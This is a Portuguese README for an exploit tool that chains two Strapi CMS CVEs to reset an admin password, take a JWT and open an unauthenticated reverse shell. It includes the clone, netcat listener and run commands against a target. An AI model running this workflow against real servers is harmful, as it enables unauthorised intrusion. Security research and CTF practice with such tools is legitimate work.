
Script de exploit demonstrando uma combinação de CVE-2019-18818 e CVE-2019-19609 para execução remota de código não autenticada no Strapi CMS.
Script de exploit demonstrando uma combinação de CVE-2019-18818 e CVE-2019-19609 para execução remota de código não autenticada no Strapi CMS.
Este script explora uma vulnerabilidade no Strapi CMS versões 3.0.0-beta.17.4 e anteriores, permitindo execução remota de código não autenticada.
O exploit funciona primeiro aproveitando uma vulnerabilidade de redefinição de senha para obter um JSON Web Token (JWT) para um usuário administrativo. Esse token é então usado para enviar um payload malicioso ao Strapi CMS, que aciona um shell reverso de volta para a máquina do atacante.
Clone o Repositório:
git clone https://github.com/Hackhoven/Strapi-RCE.git
Navegue até o diretório
cd Strapi-RCE/
Configure um Listener Netcat
nc -nlvp <LPORT>
Execute o script com a URL alvo, endereço IP do host local e porta do host local como argumentos
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
Este script é destinado apenas para fins educacionais. O autor não endossa nem apoia o uso deste script para atividades ilegais ou antiéticas. Este script deve ser usado apenas em pesquisas de segurança legais ou ambientes CTF. Use por sua conta e risco.
Feito por Hackhoven